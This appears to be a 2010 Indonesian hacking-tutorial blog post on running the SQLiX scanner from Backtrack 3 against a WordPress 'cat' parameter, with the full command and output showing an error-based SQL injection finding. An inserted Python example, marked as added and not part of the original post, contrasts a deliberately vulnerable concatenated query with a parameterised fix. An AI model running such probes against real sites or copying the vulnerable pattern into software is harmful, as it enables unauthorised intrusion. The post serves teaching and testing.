Belajar Hacking


Using SQLiX with Backtrack 3

SQLiX is a tool that analyses a web application which uses a SQL-family database (MySQL, MSSQL, ...) in its backend for vulnerability to SQL Injection attacks.

The options I usually use for a first test look like this:
root@v87:/pentest/database/SQLiX# ./SQLiX.pl -all -agent mozilla/5.0 -v=3 -url="http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999"
======================================================
-- SQLiX --
© Copyright 2006 Cedric COCHIN, All Rights Reserved.
======================================================

Analysing URL [http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999]
http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999
[+] working on HTTP User Agent
[+] Method: MS-SQL error message
[+] Method: SQL error message
[+] Method: MySQL comment injection
[DEBUG] Page Y is NOT static ==> 4dTW01Ay/qZas5eddO4Xog
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] Method: SQL Blind Statement Injection
[DEBUG] Page Y is NOT static ==> 25SLzYsMx3gUPWm7Ul8lYw
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] Method: SQL Blind String Injection
[DEBUG] Page Y is NOT static ==> zh6vOvw0YinhgixLCdB0Bg
[DEBUG] static part of reference HTML code is included in test HTML code
[ERROR] Parameter doesn't impact content
[ERROR] no comparison method available
[+] working on cat
[+] Method: MS-SQL error message
[+] Method: SQL error message
[FOUND] Match found INPUT:['] - "You have an error in your SQL syntax"
[INFO] Error with quote
[FOUND] SQL error message

RESULTS:
The variable [cat] from [http://trondolo.inc.com/webexploitation_package_02/wordpress/index.php?cat=999] is vulnerable to SQL Injection [Error message (') - MySQL].


Okay, now we know that this target is vulnerable to SQL Injection via the SQL error message method (with a single quote ') <-- yeah, this is an old-school kind of vulnerability, but it is good enough as an example!
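To show what the "Error message (') - MySQL" finding above actually means on the application side, here is an added example that is not part of the original post or of SQLiX: a constructed in-memory SQLite table (a hypothetical stand-in for the blog's "cat" lookup) queried once with the request parameter concatenated into the SQL, and once with a bound parameter. The single quote SQLiX sent makes the concatenated version raise a database error whose text reaches the caller, which is exactly the string the "SQL error message" method matches on; the bound version treats the quote as data and hides any internal error behind a generic message.

```python
import sqlite3

# Keywords a scanner's "SQL error message" method looks for in a response body.
# The MySQL text is the one quoted in the SQLiX output above; the others are the
# SQLite equivalents used by this constructed demo.
DB_ERROR_MARKERS = (
    "you have an error in your sql syntax",  # MySQL
    "syntax error",                           # SQLite / generic
    "unrecognized token",                     # SQLite unterminated string
)


def build_demo_db():
    """Constructed sample data; the schema is hypothetical, not the blog's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, cat TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO posts (cat, title) VALUES (?, ?)",
        [("1", "First post"), ("2", "Second post"), ("999", "Hidden post")],
    )
    return conn


def vulnerable_lookup(conn, cat):
    """The pattern behind the finding: the request parameter is glued into the
    SQL string and the raw database error is returned to the client."""
    sql = "SELECT title FROM posts WHERE cat = '" + cat + "'"
    try:
        rows = conn.execute(sql).fetchall()
        return {"ok": True, "rows": [r[0] for r in rows]}
    except sqlite3.Error as exc:
        # This is the leak: the engine's own message becomes page content.
        return {"ok": False, "error": str(exc)}


def hardened_lookup(conn, cat):
    """Bound parameter plus generic error handling: the quote is data, never
    SQL, and internal errors are logged server-side instead of being shown."""
    try:
        rows = conn.execute("SELECT title FROM posts WHERE cat = ?", (cat,)).fetchall()
        return {"ok": True, "rows": [r[0] for r in rows]}
    except sqlite3.Error as exc:
        print("internal db error (logged, not shown):", exc)  # placeholder logging
        return {"ok": False, "error": "request could not be processed"}


def response_leaks_db_error(result):
    """True when a response would match an error-message SQLi probe, i.e. when
    a database engine error string is visible in what the client receives."""
    if result["ok"]:
        return False
    text = result["error"].lower()
    return any(marker in text for marker in DB_ERROR_MARKERS)


if __name__ == "__main__":
    db = build_demo_db()
    probe = "999'"  # the same single-quote probe SQLiX used on the 'cat' parameter
    print("vulnerable:", vulnerable_lookup(db, probe))
    print("hardened:  ", hardened_lookup(db, probe))
```

Running it prints a database error for the concatenated query and an empty, error-free result for the parameterised one; the fix for the finding is the second function, with the error text kept in server logs where it can still be used for detection.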

credits: indobacktrack.or.id

You have just read the article titled Using SQLiX with Backtrack 3. You can bookmark this page with the URL http://blogku-duniaku.blogspot.com/2010/02/penggunaan-sqlix-with-backtrack-3.html. Thank you!
Written by: zenonk - Saturday, 20 February 2010
